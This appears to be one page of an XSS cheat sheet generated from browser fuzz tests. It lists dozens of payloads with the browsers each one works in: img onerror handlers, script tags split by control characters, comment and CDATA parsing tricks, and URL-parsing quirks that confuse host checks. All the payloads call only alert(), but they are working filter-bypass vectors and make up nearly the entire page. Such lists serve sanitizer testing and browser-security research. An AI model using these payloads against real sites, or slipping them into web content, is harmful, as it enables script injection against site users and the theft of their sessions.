Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 153 vectors with results

anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(33));0x0D
if(!/%/.test(anchor+''))alert(33)
JSURL HandlingChromeFirefoxSafari
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(40));0x0D
if(!/%/.test(anchor+''))alert(40)
JSURL HandlingChromeFirefoxSafari
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(41));0x0D
if(!/%/.test(anchor+''))alert(41)
JSURL HandlingChromeFirefoxSafari
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(42));0x0D
if(!/%/.test(anchor+''))alert(42)
JSURL HandlingChromeFirefoxSafari
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(45));0x0D
if(!/%/.test(anchor+''))alert(45)
JSURL HandlingChromeFirefoxSafari
<img src onerror=alert(61)>
XSSDOM BehaviorChromeFirefox
const x⟦09="x"0x0D
if(x==="x"){alert(9)}
JSJavaScript SyntaxChromeFirefox
const x
="x"0x0D
if(x==="x"){alert(10)}
JSJavaScript SyntaxChromeFirefox
const x0x0B="x"0x0D
if(x==="x"){alert(11)}
JSJavaScript SyntaxChromeFirefox
const x0x0C="x"0x0D
if(x==="x"){alert(12)}
JSJavaScript SyntaxChromeFirefox
const x0x0D="x"0x0D
if(x==="x"){alert(13)}
JSJavaScript SyntaxChromeFirefox
<img src=x onerror=0x09alert(9)>
XSSDOM BehaviorFirefoxChrome
<img src=x onerror=
alert(10)>
XSSDOM BehaviorFirefoxChrome
<img src=x onerror=0x0Balert(11)>
XSSDOM BehaviorFirefoxChrome
<img src=x onerror=0x0Calert(12)>
XSSDOM BehaviorFirefoxChrome
<img src=x onerror=0x0Dalert(13)>
XSSDOM BehaviorFirefoxChrome
<script0x09>alert(9)</script>
XSSHTML ParsingChromeMicrosoft EdgeFirefox
<script
>alert(10)</script>
XSSHTML ParsingChromeMicrosoft EdgeFirefox
<script0x0C>alert(12)</script>
XSSHTML ParsingChromeMicrosoft EdgeFirefox
<script0x0D>alert(13)</script>
XSSHTML ParsingChromeMicrosoft EdgeFirefox
<script >alert(32)</script>
XSSHTML ParsingChromeMicrosoft EdgeFirefox
<a href="/0x09/example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="/
/example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="/0x0D/example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="///example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="/\/example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https:\\example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="//0x09example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="//
example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="//0x0Dexample2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="///example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="//@example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<svg><style>0D⟧
x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=alert(93)>">
XSSCSS ParsingChromeFirefoxSafari
var markup = `<a0x09id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(9)0x0D
 }0x0D
0x0D
0x0D
JSDOM BehaviorChrome
var markup = `<a
id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(10)0x0D
 }0x0D
0x0D
0x0D
JSDOM BehaviorChrome
var markup = `<a0x0Cid=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(12)0x0D
 }0x0D
0x0D
0x0D
JSDOM BehaviorChrome
var markup = `<a0x0Did=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(13)0x0D
 }0x0D
0x0D
0x0D
JSDOM BehaviorChrome
var markup = `<a id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(32)0x0D
 }0x0D
0x0D
0x0D
JSDOM BehaviorChrome
if('1337' + String.fromCodePoint(9) + String.fromCodePoint(9) == 1337){alert(9)}
JSCharacter EncodingChrome
if('1337' + String.fromCodePoint(10) + String.fromCodePoint(10) == 1337){alert(10)}
JSCharacter EncodingChrome
if('1337' + String.fromCodePoint(11) + String.fromCodePoint(11) == 1337){alert(11)}
JSCharacter EncodingChrome
if('1337' + String.fromCodePoint(12) + String.fromCodePoint(12) == 1337){alert(12)}
JSCharacter EncodingChrome
if('1337' + String.fromCodePoint(13) + String.fromCodePoint(13) == 1337){alert(13)}
JSCharacter EncodingChrome
if (new URL("https://0x09google.com/endpoint").host=="google.com"){alert(9)}
JSURL HandlingChromeFirefox
if (new URL("https:///google.com/endpoint").host=="google.com"){alert(47)}
JSURL HandlingChromeFirefox
if (new URL("https://@google.com/endpoint").host=="google.com"){alert(64)}
JSURL HandlingChromeFirefox
if (new URL("https://\google.com/endpoint").host=="google.com"){alert(92)}
JSURL HandlingChromeFirefox
if (new URL("https://­google.com/endpoint").host=="google.com"){alert(173)}
JSURL HandlingChromeFirefox
prompt?.();alert(63)
JSXSS ExecutionChromeMicrosoft Edge
alert0x09();alert(9)
JSXSS ExecutionChrome
alert
();alert(10)
JSXSS ExecutionChrome
alert0x0B();alert(11)
JSXSS ExecutionChrome
alert0x0C();alert(12)
JSXSS ExecutionChrome
alert0x0D();alert(13)
JSXSS ExecutionChrome
eval('0x09alert(9)0x09')
JSJavaScript SyntaxFirefox
eval('0x0Balert(11)0x0B')
JSJavaScript SyntaxFirefox
eval('0x0Calert(12)0x0C')
JSJavaScript SyntaxFirefox
eval(' alert(32) ')
JSJavaScript SyntaxFirefox
eval(';alert(59);')
JSJavaScript SyntaxFirefox
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->
XSSHTML ParsingChromeFirefoxSafari
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->
XSSHTML ParsingChromeFirefoxSafari
<div 0x09="><img src=x:x onerror=alert(9)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div 
="><img src=x:x onerror=alert(10)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div 0x0C="><img src=x:x onerror=alert(12)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div 0x0D="><img src=x:x onerror=alert(13)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div  ="><img src=x:x onerror=alert(32)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->
XSSHTML ParsingFirefoxSafariChrome
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->
XSSHTML ParsingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(91) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(91)}
JSURL HandlingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(65095) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65095)}
JSURL HandlingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(65339) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65339)}
JSURL HandlingFirefoxSafariChrome
"0x091337"==1337&&alert(9)
JSCharacter EncodingChromeFirefoxSafari
"0x0B1337"==1337&&alert(11)
JSCharacter EncodingChromeFirefoxSafari
"0x0C1337"==1337&&alert(12)
JSCharacter EncodingChromeFirefoxSafari
" 1337"==1337&&alert(32)
JSCharacter EncodingChromeFirefoxSafari
"+1337"==1337&&alert(43)
JSCharacter EncodingChromeFirefoxSafari

Page 5 of 8